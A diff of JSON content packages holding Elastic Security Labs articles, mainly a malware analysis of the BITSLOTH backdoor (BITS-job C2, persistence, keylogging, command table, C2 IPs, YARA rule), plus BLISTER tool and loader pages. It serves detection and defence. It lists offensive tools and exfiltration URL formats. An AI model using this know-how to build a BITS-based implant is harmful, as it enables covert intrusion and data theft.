The intrusion was traced back to PSEXEC execution on one of the infected endpoints. The attackers used a slew of publicly available tools for most of their operations with the exception of BITSLOTH.\n\n - [RINGQ](https://github.com/T4y1oR/RingQ)\n - [IOX](https://github.com/EddieIvan01/iox)\n - [STOWAWAY](https://github.com/ph4ntonn/Stowaway)\n - [GODPOTATO](https://github.com/BeichenDream/GodPotato)\n - [NOPAC](https://github.com/Ridter/noPac)\n - [MIMIKATZ](https://github.com/gentilkiwi/mimikatz)\n - [PPLFAULT](https://github.com/gabriellandau/PPLFault)\n - [CERTIFY](https://github.com/GhostPack/Certify)\n\nOne of the primary mechanisms of execution was through a shellcode loading project called RINGQ. In a similar fashion to DONUTLOADER, RINGQ will convert any Windows executable and generate custom shellcode, placing it into a file (main.txt). This shellcode gets decrypted and executed in-memory. This technique is used to bypass defenses that rely on hash blocklists or static signatures in some anti-malware products.\n\n\n\nWe observed RINGQ being used to load the IOX port forwarder. Note: The key in the image below is the hex conversion of “whoami”.\n\n\n\nAdditionally, the attackers used the STOWAWAY utility to proxy encrypted traffic over HTTP to their C2 servers. Proxy tools, tunnelers, and redirectors are commonly used during intrusions to conceal the adversary responsible for an intrusion. These tools offer adversaries various features, including the ability to bypass internal network controls, terminal interfaces, encryption capabilities, and file transfer options.\n\n\n\nAfter initial access, the actor moved laterally and dropped BITSLOTH in the form of a DLL (```flengine.dll```) inside the ProgramData directory. The actor then executed the music-making program FL Studio (```fl.exe```). 
Based on the observed call stack associated with the self-injection alert, we confirmed the threat actor used a traditional side-loading technique using a signed version of [FL Studio](https://www.virustotal.com/gui/file/75747c8b5b3676abde25a8dd66280908c0d0fc57ef054b88a41673619d3bee28/details). \n\n```\n c:\\windows\\syswow64\\ntdll.dll!0x770841AC\n c:\\windows\\syswow64\\ntdll.dll!0x7709D287\n c:\\windows\\syswow64\\kernelbase.dll!0x76ED435F\n c:\\windows\\syswow64\\kernelbase.dll!0x76ED42EF\n Unbacked!0x14EAB23\n Unbacked!0x14EA8B6\n c:\\programdata\\pl studio\\flengine.dll!0x74AD2F2E\n c:\\programdata\\pl studio\\fl.exe!0xDB3985\n c:\\programdata\\pl studio\\fl.exe!0xDB3E5E\n c:\\programdata\\pl studio\\fl.exe!0xDB4D3F\n c:\\windows\\syswow64\\kernel32.dll!0x76B267F9\n c:\\windows\\syswow64\\ntdll.dll!0x77077F4D\n c:\\windows\\syswow64\\ntdll.dll!0x77077F1B\n```\n\nThis call stack was generated along with a process injection alert and enabled researchers to extract an in-memory DLL that was set with Read/Write/Execute (RWX) page protections.\n\n#### BITSLOTH overview\n\nDuring our analysis, we found several older BITSLOTH samples demonstrating a record of development since December 2021. Within this project, the malware developer chose notable terminology, referring to BITSLOTH as the ```Slaver``` component and the command and control server as the ```Master``` component. Below is an example of one of the PDB file paths linked to BITSLOTH that depicts this:\n\n\n\nBITSLOTH employs no obfuscation around control flow or any kind of string encryption.\n\n\n\nBoth older and recent samples contain strings used for logging and debugging purposes. As an example, at startup there is a string referenced in the read-only section (```.rdata```). 
\n\n \n\nThis Simplified Chinese wide-character string translates to:\n```Note: There is already a program running, do not run it again…```\n\n\n\nThese small snippets contained within BITSLOTH help shed light on the development and prioritization of features, along with what appear to be operator instructions. In the latest version, a new scheduling component was added by the developer to control specific times when BITSLOTH should operate in a victim environment. This is a feature we have observed in other modern malware families such as [EAGERBEE](https://www.elastic.co/security-labs/introducing-the-ref5961-intrusion-set).\n\n\n\n## BITSLOTH code analysis\n\nBITSLOTH is a backdoor with many different capabilities including:\n\n - Running and executing commands\n - Uploading and downloading files\n - Performing enumeration and discovery \n - Collecting sensitive data through keylogging and screen capturing\n\n### Mutex\n\nBITSLOTH uses a hard-coded mutex (```Global\\d5ffff77ff77adad657658```) within each sample to ensure only one instance is running at a time. \n\n\n\n### Communication\n\nBITSLOTH adopts a traditional client/server architecture, the developer refers to the client as the ```Slaver``` component and the command and control server (C2) as the ```Master``` component. The developer embeds the IP/port of the C2 server in each sample with a front-loaded string (```rrrr_url```). 
This string acts as a key to identify the C2 configuration in memory while the malware is running; it is used when updating the C2 server.\n\nBelow are the configurations from several samples our team has observed; the threat actor configures both internal and external IP ranges.\n\n```\nrrrr_url216.238.121[.]132:8443\nrrrr_url192.168.1[.]125:8443 \nrrrr_url192.168.1[.]124:8443\nrrrr_url45.116.13[.]178:443\n```\n\nOne of the defining features of BITSLOTH is using the [Background Intelligent Transfer Service](https://learn.microsoft.com/en-us/windows/win32/bits/background-intelligent-transfer-service-portal) (BITS) for C2. While this feature has been designed to facilitate the network transfer of files between two machines, it’s been [abused](https://www.welivesecurity.com/2019/09/09/backdoor-stealth-falcon-group/) by multiple state-sponsored groups and continues to fly under the radar against organizations. This medium is appealing to adversaries because many organizations still struggle to monitor BITS network traffic and detect unusual BITS jobs.\n\n> Windows has a system administration feature called Background Intelligent Transfer Service (BITS) enabling the download and upload of files to HTTP web servers or SMB shares. The BITS service employs multiple features during the file transfer process such as the ability to pause/resume transfers, handling network interruptions, etc. BITS traffic is usually associated with software updates and is therefore wrongly assumed to be trusted. Many organizations lack visibility into BITS network traffic, making this an appealing target.\n\nThe BITS API is exposed through Windows’ [Component Object Model](https://learn.microsoft.com/en-us/windows/win32/com/component-object-model--com--portal) (COM) using the **IBackgroundCopyManager** [interface](https://learn.microsoft.com/en-us/windows/win32/api/bits/nn-bits-ibackgroundcopymanager). 
This interface provides capabilities to create new jobs, enumerate existing jobs in the transfer queue, and access a specific job from a transfer queue.\n\n\n\nAfter initialization, BITSLOTH cancels any existing BITS jobs on the victim machine that match the following display names:\n\n - ```WU Client Download```\n - ```WU Client Upload```\n - ```WU Client Upload R```\n\nThese names are used by the developer to blend in and associate the different BITS transfer jobs with their respective BITS [job type](https://learn.microsoft.com/en-us/windows/win32/api/bits/ne-bits-bg_job_type). Canceling any existing jobs allows the malware to operate from a clean state.\n\n\n\nBelow are the Microsoft definitions matching the type of BITS job:\n\n - **BG_JOB_TYPE_DOWNLOAD** - Specifies that the job downloads files to the client.\n - **BG_JOB_TYPE_UPLOAD** - Specifies that the job uploads a file to the server.\n - **BG_JOB_TYPE_UPLOAD_REPLY** - Specifies that the job uploads a file to the server, and receives a reply file from the server application.\n\nAfter canceling any existing jobs, the MAC address and operating system information are retrieved and placed into global variables. A new thread is created to configure the auto-start functionality. Within this thread, a new BITS download job is created with the name (```Microsoft Windows```).\n\n\n\nThis download job sets the destination URL to ```http://updater.microsoft[.]com/index.aspx```. While this domain is not routable, BITSLOTH masquerades this BITS job using a benign-looking domain as a cover, then uses **SetNotifyCmdLine** to execute the malware when the transfer state is changed.\n\n\n\nInterestingly, this unique toolmark allowed us to pivot to additional samples showing this family has been in circulation for several years. \n \n\n\nAt this point, the malware has been configured with persistence via a BITS job named ```Microsoft Windows```. 
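The startup cleanup and job-type association described above can be sketched in a few lines; this is a minimal Python model for illustration only (the real malware drives these operations through the **IBackgroundCopyManager** COM interface, and the job records below are hypothetical stand-ins):

```python
# Minimal sketch of BITSLOTH's startup cleanup logic. The job records are
# hypothetical stand-ins for real BITS jobs (the malware uses COM, not dicts).
MALWARE_JOBS = {
    'WU Client Download': 'BG_JOB_TYPE_DOWNLOAD',
    'WU Client Upload': 'BG_JOB_TYPE_UPLOAD',
    'WU Client Upload R': 'BG_JOB_TYPE_UPLOAD_REPLY',
}

def cancel_leftover_jobs(jobs):
    '''Drop any queued jobs whose display name matches a BITSLOTH job name.'''
    return [job for job in jobs if job['name'] not in MALWARE_JOBS]

queue = [
    {'name': 'Edge Update', 'type': 'BG_JOB_TYPE_DOWNLOAD'},
    {'name': 'WU Client Download', 'type': 'BG_JOB_TYPE_DOWNLOAD'},
    {'name': 'WU Client Upload', 'type': 'BG_JOB_TYPE_UPLOAD'},
]
print(cancel_leftover_jobs(queue))  # only the unrelated 'Edge Update' job survives
```

Matching on display names this way is also a useful detection angle: legitimate BITS jobs rarely reuse these exact strings.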
Below is a screenshot of this job’s configuration showing the notification command line set to the BITSLOTH location (```C:\\ProgramData\\Media\\setup_wm.exe```).\n\n\n\nOnce BITSLOTH becomes active, it will start requesting instructions from the C2 server using the ```WU Client Download``` job. This request URL is generated by combining the MAC address with a hard-coded string (```wu.htm```). Below is an example URL:\n\n```\nhttps://192.168.182.130/00-0C-29-0E-29-87/wu.htm\n```\n\nIn response to this request, the malware will then receive a 12-byte structure from the C2 server containing a unique ID for the job, a command ID for the handler, and a response token. Throughout these exchanges of file transfers, temporary files on the victim machine are used as placeholders to hold the data being transmitted back and forth; BITSLOTH uses filenames starting with the characters (```wm```) followed by random characters.\n\n\n\n\n### Command functionality\n\nBITSLOTH uses a command handler with 35 functions to process specific actions that should be taken on the victim machine. The malware has the option to be configured with HTTP or HTTPS and uses a hard-coded single-byte XOR (```0x2```) to obfuscate the incoming instructions from the C2 server. The outbound requests containing the collected victim data receive no additional protection from the malware itself and are sent in plaintext. \n\nIn order to move fast, our team leveraged a helpful Python [implementation](https://github.com/SafeBreach-Labs/SimpleBITSServer) of a BITS server released by [SafeBreach Labs](https://www.safebreach.com/). Setting the C2 IP to our loopback address inside a VM allowed us to inspect the network traffic. \n\n\n\nThe handlers all follow a similar approach: performing a primary function, then writing the data returned from the handler to a local temporary file. These temporary files then get mapped to a BITS upload job called ```WU Client Upload```. 
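The check-in exchange described earlier in this section can be sketched as follows; this is a rough Python model for illustration, and the field order of the 12-byte structure is an assumption:

```python
import struct

XOR_KEY = 0x02  # hard-coded single-byte key used on inbound C2 instructions

def xor_decode(data: bytes) -> bytes:
    '''Undo the single-byte XOR applied to instructions from the C2 server.'''
    return bytes(b ^ XOR_KEY for b in data)

def checkin_url(c2: str, mac: str) -> str:
    '''Build the beacon URL from the victim MAC address and the wu.htm suffix.'''
    return f'https://{c2}/{mac}/wu.htm'

print(checkin_url('192.168.182.130', '00-0C-29-0E-29-87'))
# -> https://192.168.182.130/00-0C-29-0E-29-87/wu.htm

# Simulated 12-byte response: job ID, command ID, response token
# (field order and endianness are assumptions for illustration).
raw = bytes(b ^ XOR_KEY for b in struct.pack('<III', 7, 2, 0xCAFEF00D))
job_id, command_id, token = struct.unpack('<III', xor_decode(raw))
```

A single-byte XOR is its own inverse, which is why the same routine can both obfuscate and deobfuscate the instruction stream.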
Each handler uses its own string formatting to create a unique destination URL. Each filename at the end of the URL uses a single letter to represent the type of data collected from the host, such as ```P.bin``` for processes or ```S.bin``` for services.\n\n```\nhttp://192.168.182.130/00-0C-29-0E-29-87/IF/P.bin\n```\n\nBelow is an example screenshot showing the process enumeration handler with the string formatting and how this data is then linked to the BITS upload job.\n\n\n\nThis link to the exfiltrated data can also be observed by viewing the BITS upload job directly. In the screenshots below, we can see the destination URL (C2 server) for the upload and the temporary file (```wm9F0C.tmp```) linked to the job.\n\n\n\nIf we look at the temporary file, we can see the collected process information from the victim host.\n\n\n\nSoon after the upload job is created, the data is sent over the network through a BITS_POST request containing the captured data.\n\n\n\n### Command handling table\n\n| Command ID | Description |\n| ----- | ----- |\n| 0 | Collect running processes via **WTSEnumerateProcessesW** |\n| 1 | Get Windows services via **EnumServicesStatusW** |\n| 2 | Get system information via ```systeminfo``` command |\n| 3 | Retrieve all top-level windows via **EnumWindows** |\n| 5 | Collect file listings |\n| 6 | Download file from C2 server |\n| 7 | Upload file to C2 server |\n| 10 | Terminate itself |\n| 11 | Set communication mode to HTTPS |\n| 12 | Set communication mode to HTTP |\n| 13 | Remove persistence |\n| 14 | Reconfigure persistence |\n| 15 | Cancel BITS download job (```WU Client Download```) |\n| 16 | Remove persistence and delete itself |\n| 17 | Thread configuration |\n| 18 | Duplicate of handler #2 |\n| 19 | Delete file based on file path |\n| 20 | Delete folder based on file path |\n| 21 | Start terminal shell using stdin/stdout redirection |\n| 22 | Reset terminal handler (#21) |\n| 23 | Run Windows tree command |\n| 24 | Update BITSLOTH, 
delete old version |\n| 25 | Shut down the machine via **ExitWindowsEx** |\n| 26 | Reboot the machine via **ExitWindowsEx** |\n| 27 | Log user off from the machine via **ExitWindowsEx** |\n| 28 | Terminate process based on process identifier (PID) |\n| 29 | Retrieve additional information via ```msinfo32``` command |\n| 30 | Execute individual file via **ShellExecuteW** |\n| 34 | Create new directory via **CreateDirectoryW** |\n| 41 | Upload data to C2 server | \n| 42 | Check for capture driver via **capGetDriverDescriptionW** |\n| 43 | Take screenshots of victim machine desktop |\n| 44 | Record keystrokes from victim machine |\n| 45 | Stop recording screenshot images |\n| 46 | Stop keylogger functionality |\n\n### Backdoor functionality\n\nBITSLOTH includes a wide range of post-compromise capabilities for an adversary to operate within a victim environment. We will focus on the more significant capabilities by grouping them into different categories.\n\n#### Discovery/enumeration\n\nA portion of the BITSLOTH handlers is focused on retrieving and enumerating data from victim machines. This includes:\n\n - Retrieving process information via **WTSEnumerateProcessesW**\n - Collecting Windows services via **EnumServicesStatusW**\n - Enumerating all top-level windows via **EnumWindows** with a callback function\n - Retrieving system information via Windows utilities such as ```systeminfo``` and ```msinfo32```\n\n\n\nIn many of the handlers, the locale version is configured to ```chs``` (Chinese - Simplified).\n\n\n\nBITSLOTH has a couple of custom enumeration functions tied to retrieving file listings and performing directory tree searches. 
The file listing handler takes a custom parameter from the operator to target specific folder locations of interest:\n\n - **GET_DESKDOP** → **CSIDL_DESKTOPDIRECTORY** (Desktop)\n - **GET_BITBUCKET** → **CSIDL_BITBUCKET** (Recycle Bin)\n - **GET_PERSONAl** → **CSIDL_MYDOCUMENTS** (My Documents)\n\n\n\nBITSLOTH also has the ability to collect entire directory/file listings on the machine by using the Windows [tree](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/tree) utility. This handler loops through the alphabet for each drive letter, saving the data locally in a temporary file named ```aghzyxklg```. \n\n\n\nThe tree data is then compressed and sent to the C2 server with a .ZIP extension. Below is an example of the collected data. This data can help pinpoint sensitive files or provide more context about the target environment. \n\n\n\n#### Collection\n\nIn terms of collection, there are a few handlers used for actively gathering information. These are centered around capturing screenshots from the desktop and performing keylogging functionality.\n\nBITSLOTH implements a lightweight function used to identify capture recording devices; this appears to be a technique to check for a camera using the Windows API (**capGetDriverDescriptionW**). \n\n\n\nBITSLOTH has the ability to take screenshots based on parameters provided by the operator. Input to this function uses a separator (```||```) where the operator provides the number of seconds for the capture interval and the capture count. The images are stored as BMP files with a hard-coded name ```ciakfjoab``` and compressed with the DEFLATE algorithm using a ```.ZIP``` archive. 
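The operator input format and archive packaging just described can be sketched as follows; the `interval||count` ordering is an assumption for illustration, while the hard-coded BMP name comes from the sample:

```python
import io
import zipfile

def parse_capture_args(arg: str) -> tuple[int, int]:
    '''Split operator input on the '||' separator; ordering is assumed to be
    capture interval (seconds) followed by capture count.'''
    interval, count = arg.split('||')
    return int(interval), int(count)

def pack_screenshot(bmp_bytes: bytes) -> bytes:
    '''Compress a captured BMP into a DEFLATE .ZIP, mirroring the handler.'''
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as zf:
        zf.writestr('ciakfjoab.bmp', bmp_bytes)  # hard-coded name from the sample
    return buf.getvalue()

print(parse_capture_args('30||5'))  # -> (30, 5): every 30 seconds, 5 captures
```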
These timestamped zipped archives are then sent out to the C2 server.\n\nThe handler leverages common screenshot APIs such as **CreateCompatibleBitmap** and **BitBlt** from ```Gdi32.dll```.\n\n\n\nFor recording keystrokes, BITSLOTH uses traditional techniques by monitoring key presses using **GetAsyncKeyState**/**GetKeyState**. The handler has an argument for the number of seconds to perform the keylogging. This data is also compressed in a ```.ZIP``` file and sent outbound to the C2 server.\n\n\n\n#### Execution / Maintenance\n\nBITSLOTH has multiple capabilities around maintenance and file execution as well as standard backdoor functionalities such as:\n\n - Capability to execute files stand-alone via **ShellExecuteW**\n - Windows terminal capability to execute commands and read data back via pipes\n - Create directories, perform reboots, shut down the machine, terminate processes\n - Perform file upload and download to and from the C2 server\n - Modify BITSLOTH configuration such as communication modes, update C2 URL, turn off keylogging/screenshot features\n\n\n\n## BITSLOTH pivots\n\nBITSLOTH appears to be actively deployed. We identified another BITSLOTH C2 server (```15.235.132[.]67```) using the same port (```8443```) with the same [SSL certificate](https://www.shodan.io/search?query=ssl.cert.serial%3A253c1c0bbf58e1f509fc4468de462ed8872f81d9) seen in our intrusion. \n\n\n\nWhile it’s not exactly clear who’s behind BITSLOTH, there was a large burst of VirusTotal upload activity on December 12, 2021. With around 67 uploads over 24 hours from one submitter (```1fcc35ea```), we suspect someone linked to this project was validating detections, making modifications, and uploading different versions of BITSLOTH to VirusTotal. One sample was packed with VMProtect, others were stripped of functionality, some uploads were debug builds, etc.\n\n\n\nA lot of time has passed since then, but it is interesting to see this family show up in a recent intrusion. 
Whatever the objective behind this malware, it's surprising that this family remained under the radar for so many years.\n\n\n\n### REF8747 through MITRE ATT&CK\n\nElastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.\n\n#### Tactics\n\nTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.\n\n - [Collection](https://attack.mitre.org/tactics/TA0009/)\n - [Command and Control](https://attack.mitre.org/tactics/TA0011/)\n - [Discovery](https://attack.mitre.org/tactics/TA0007/)\n - [Execution](https://attack.mitre.org/tactics/TA0002/)\n - [Exfiltration](https://attack.mitre.org/tactics/TA0010/)\n - [Persistence](https://attack.mitre.org/tactics/TA0003/)\n \n#### Techniques\n\nTechniques represent how an adversary achieves a tactical goal by performing an action.\n\n - [BITS Jobs](https://attack.mitre.org/techniques/T1197/)\n - [System Information Discovery](https://attack.mitre.org/techniques/T1082/)\n - [Hijack Execution Flow: DLL Side-Loading](https://attack.mitre.org/techniques/T1574/002/)\n - [Screen Capture](https://attack.mitre.org/techniques/T1113/)\n - [Input Capture: Keylogging](https://attack.mitre.org/techniques/T1056/001/)\n - [Proxy](https://attack.mitre.org/techniques/T1090/)\n\n## Detecting REF8747\n\n### Detection\n\nThe following detection rules and behavior prevention events were observed throughout the analysis of this intrusion set:\n\n - [Persistence via BITS Job Notify Cmdline](https://github.com/elastic/endpoint-rules/blob/0f01f1a9e2ac08e9ead74cafd4d73cb8166f9fc8/rules/windows/persistence_execution_via_bits_setnotifycmdline_method.toml)\n - [LSASS Access Attempt via PPL Bypass](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/credential_access_lsass_access_attempt_via_ppl_bypass.toml)\n - [LSASS Access 
Attempt from an Unsigned Executable](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/credential_access_lsass_access_attempt_from_an_unsigned_executable.toml)\n - [Suspicious Parent-Child Relationship](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/defense_evasion_suspicious_parent_child_relationship.toml)\n - [Credential Access via Known Utilities](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/credential_access_credential_access_via_known_utilities.toml)\n - Shellcode Injection\n\n#### YARA Signatures\n\n - [Windows.Hacktool.Mimikatz](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_Mimikatz.yar)\n - [Windows.Trojan.BITSloth](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_BITSloth.yar)\n - [Windows.Hacktool.Iox](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_Iox.yar)\n - [Windows.Hacktool.Rubeus](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_Rubeus.yar)\n - [Windows.Hacktool.Certify](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_Certify.yar)\n - [Windows.Hacktool.RingQ](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_RingQ.yar)\n - [Windows.Hacktool.GodPotato](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_GodPotato.yar)\n - [Multi.Hacktool.Stowaway](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Multi_Hacktool_Stowaway.yar)\n\n#### YARA\n\nElastic Security has created YARA rules to identify this activity. 
Below is the YARA rule to identify BITSLOTH:\n\n```\nrule Windows_Trojan_BITSLOTH_05fc3a0a {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2024-07-16\"\n last_modified = \"2024-07-18\"\n os = \"Windows\"\n arch = \"x86\"\n threat_name = \"Windows.Trojan.BITSLOTH\"\n license = \"Elastic License v2\"\n\n strings:\n $str_1 = \"/%s/index.htm?RspID=%d\" wide fullword\n $str_2 = \"/%s/%08x.rpl\" wide fullword\n $str_3 = \"/%s/wu.htm\" wide fullword\n $str_4 = \"GET_DESKDOP\" wide fullword\n $str_5 = \"http://updater.microsoft.com/index.aspx\" wide fullword\n $str_6 = \"[U] update error...\" wide fullword\n $str_7 = \"RMC_KERNEL ...\" wide fullword\n $seq_global_protocol_check = { 81 3D ?? ?? ?? ?? F9 03 00 00 B9 AC 0F 00 00 0F 46 C1 }\n $seq_exit_windows = { 59 85 C0 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A 02 EB ?? 56 EB }\n condition:\n 2 of them\n}\n```\n\n## Observations\n\nAll observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/bitsloth) in both ECS and STIX format in a combined zip bundle.\n\nThe following observables were discussed in this research.\n\n| Observable | Type | Name | Reference |\n| ----- | ----- | ----- | ----- |\n| 4a4356faad620bf12ff53bcfac62e12eb67783bd22e66bf00a19a4c404bf45df | SHA-256 | ```s.dll``` | BITSLOTH |\n| dfb76bcf5a3e29225559ebbdae8bdd24f69262492eca2f99f7a9525628006d88 | SHA-256 | ```125.exe``` | BITSLOTH |\n| 4fb6dd11e723209d12b2d503a9fcf94d8fed6084aceca390ac0b7e7da1874f50 | SHA-256 | ```setup_wm.exe``` | BITSLOTH |\n| 0944b17a4330e1c97600f62717d6bae7e4a4260604043f2390a14c8d76ef1507 | SHA-256 | ```1242.exe``` | BITSLOTH |\n| 0f9c0d9b77678d7360e492e00a7fa00af9b78331dc926b0747b07299b4e64afd | SHA-256 | ```setup_wm.exe``` | BITSLOTH (VMProtect) |\n| 216.238.121[.]132 | ipv4-addr | | BITSLOTH C2 server |\n| 45.116.13[.]178 | ipv4-addr | | BITSLOTH C2 server |\n| 15.235.132[.]67 | ipv4-addr | | BITSLOTH C2 server |\n| http://updater.microsoft[.]com/index.aspx | | | BITSLOTH file 
indicator |\n| updater.microsoft[.]com | | | BITSLOTH file indicator |\n\n## References\n\nThe following were referenced throughout the above research:\n\n - [https://github.com/SafeBreach-Labs/SimpleBITSServer/tree/master](https://github.com/SafeBreach-Labs/SimpleBITSServer/tree/master)\n - [https://github.com/T4y1oR/RingQ](https://github.com/T4y1oR/RingQ)\n - [https://github.com/EddieIvan01/iox](https://github.com/EddieIvan01/iox)\n - [https://github.com/ph4ntonn/Stowaway/](https://github.com/ph4ntonn/Stowaway/)\n\n## About Elastic Security Labs\n\nElastic Security Labs is the threat intelligence branch of Elastic Security dedicated to creating positive change in the threat landscape. Elastic Security Labs provides publicly available research on emerging threats with an analysis of strategic, operational, and tactical adversary objectives, then integrates that research with the built-in detection and response capabilities of Elastic Security.\n\nFollow Elastic Security Labs on Twitter [@elasticseclabs](https://twitter.com/elasticseclabs?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor) and check out our research at [www.elastic.co/security-labs/](https://www.elastic.co/security-labs/). "
+ },
+ "title": "BITS and Bytes: Analyzing BITSLOTH, a newly identified backdoor",
+ "slug": "bits-and-bytes-analyzing-bitsloth",
+ "date": "2024-08-01",
+ "description": "Elastic Security Labs identified a novel Windows backdoor leveraging the Background Intelligent Transfer Service (BITS) for C2. This malware was found during a recent activity group tracked as REF8747.",
+ "author": [
+ {
+ "slug": "seth-goodwin"
+ },
+ {
+ "slug": "daniel-stepanic"
+ }
+ ],
+ "image": "Security Labs Images 29.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ]
+ },
+ "id": "security_labs_content-bits_and_bytes_analyzing_bitsloth-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-blister_configuration_extractor-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-blister_configuration_extractor-md.json
new file mode 100644
index 00000000000..f33b4b554a1
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-blister_configuration_extractor-md.json
@@ -0,0 +1,28 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"BLISTER Configuration Extractor\"\nslug: \"blister-configuration-extractor\"\ndate: \"2022-12-06\"\ndescription: \"Python script to extract the configuration and payload from BLISTER samples.\"\nauthor:\n - slug: elastic-security-labs\nimage: \"tools-image.jpg\"\ncategory:\n - slug: tools\ntags:\n - blister\n - ref7890\n---\n\nPython script to extract the configuration and payload from BLISTER samples.\n\n[Download blister-config-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9bce8a0e1a513bd5/62882db13b9b8554904a4baa/blister-config-extractor.tar.gz)\n\n## Getting Started\n\nThis tool provides a Python module and command-line tool that will extract configurations from the BLISTER malware loader and dump the results to screen.\n\n> For information on the BLISTER malware loader and campaign observations, check out our blog posts detailing this:\n>\n> - [BLISTER Campaign Analysis](https://www.elastic.co/security-labs/elastic-security-uncovers-blister-malware-campaign)\n> - [BLISTER Malware Analysis](https://www.elastic.co/security-labs/blister-loader)\n\n### Docker\n\nWe can easily run the extractor with Docker. First, we need to build the image:\n\n```\ndocker build . -t blister-config-extractor\n```\n\nThen we run the container with the **-v** flag to map a host directory to the Docker container directory:\n\n```\ndocker run -ti --rm -v \\\n\"$(pwd)/binaries\":/binaries blister-config-extractor:latest -d /binaries/\n\n```\n\nWe can specify either a single sample with the **-f** option or a directory of samples with **-d**.\n\n\n\n### Running it Locally\n\nAs mentioned above, Docker is the recommended approach to running this project; however, you can also run it locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. 
This will set up a virtual environment, install the dependencies, activate the virtual environment, and run the console script.\n\n```\npoetry lock\npoetry install\npoetry shell\nblister-config-extractor -h\n\n```\n\nOnce that works, you can do the same sort of things as mentioned in the Docker instructions above.\n\n## References\n\n- Customised Rabbit cipher implementation based on [Rabbit-Cipher](https://github.com/Robin-Pwner/Rabbit-Cipher/)\n"
+ },
+ "title": "BLISTER Configuration Extractor",
+ "slug": "blister-configuration-extractor",
+ "date": "2022-12-06",
+ "description": "Python script to extract the configuration and payload from BLISTER samples.",
+ "author": [
+ {
+ "slug": "elastic-security-labs"
+ }
+ ],
+ "image": "tools-image.jpg",
+ "category": [
+ {
+ "slug": "tools"
+ }
+ ],
+ "tags": [
+ "blister",
+ "ref7890"
+ ]
+ },
+ "id": "security_labs_content-blister_configuration_extractor-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-blister_loader-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-blister_loader-md.json
new file mode 100644
index 00000000000..bc4b3eaef75
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-blister_loader-md.json
@@ -0,0 +1,34 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"BLISTER Loader\"\nslug: \"blister-loader\"\ndate: \"2023-04-13\"\ndescription: \"The BLISTER loader continues to be actively used to load a variety of malware.\"\nauthor:\n - slug: cyril-francois\n - slug: daniel-stepanic\n - slug: salim-bitam\nimage: \"blog-thumb-power-lines.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - blister\n - malware\n---\n\n## Key Takeaways\n\n- BLISTER is a loader that continues to stay under the radar, actively being used to load a variety of malware including clipbankers, information stealers, trojans, ransomware, and shellcode\n- In-depth analysis shows heavy reliance on Windows native APIs, several injection capabilities, and multiple techniques to evade detection and counter static/dynamic analysis\n- Elastic Security is providing a configuration extractor that can be used to identify key elements of the malware and dump the embedded payload for further analysis\n- 40 days after the initial reporting on the BLISTER loader by Elastic Security, we observed a change in the binary to include additional architectures. This shows that this is an actively developed tool and the authors are watching defensive countermeasures\n\n> For information on the BLISTER malware loader and campaign observations, check out our blog post and configuration extractor detailing this:\n>\n> - [BLISTER Campaign Analysis](https://www.elastic.co/security-labs/elastic-security-uncovers-blister-malware-campaign)\n> - [BLISTER Configuration Extractor](https://www.elastic.co/security-labs/blister-configuration-extractor)\n\n## Overview\n\nThe Elastic Security team has continually been monitoring the BLISTER loader since our initial [release](https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign) at the end of last year. 
This family continues to remain largely unnoticed, with low detection rates on new samples.\n\n\n\nA distinguishing characteristic of BLISTER’s author is their method of tampering with legitimate DLLs to bypass static analysis. During the past year, Elastic Security has observed the following legitimate DLLs patched by BLISTER malware:\n\n| Filename | Description |\n| -------------- | ------------------------------------------------------------------ |\n| dxgi.dll | DirectX Graphics Infrastructure |\n| WIAAut.DLL | WIA Automation Layer |\n| PowerCPL.DLL | Power Options Control Panel |\n| WIMGAPI.DLL | Windows Imaging Library |\n| rdpencom.dll | RDPSRAPI COM Objects |\n| colorui.dll | Microsoft Color Control Panel |\n| termmgr.dll | Microsoft TAPI3 Terminal Manager |\n| libcef.dll | Chromium Embedded Framework (CEF) Dynamic Link Library |\n| CEWMDM.DLL | Windows CE WMDM Service Provider |\n| intl.dll | LGPLed libintl for Windows NT/2000/XP/Vista/7 and Windows 95/98/ME |\n| vidreszr.dll | Windows Media Resizer |\n| sppcommdlg.dll | Software Licensing UI API |\n\nDue to the way malicious code is embedded in an otherwise benign application, BLISTER may be challenging for technologies that rely on some forms of machine learning. 
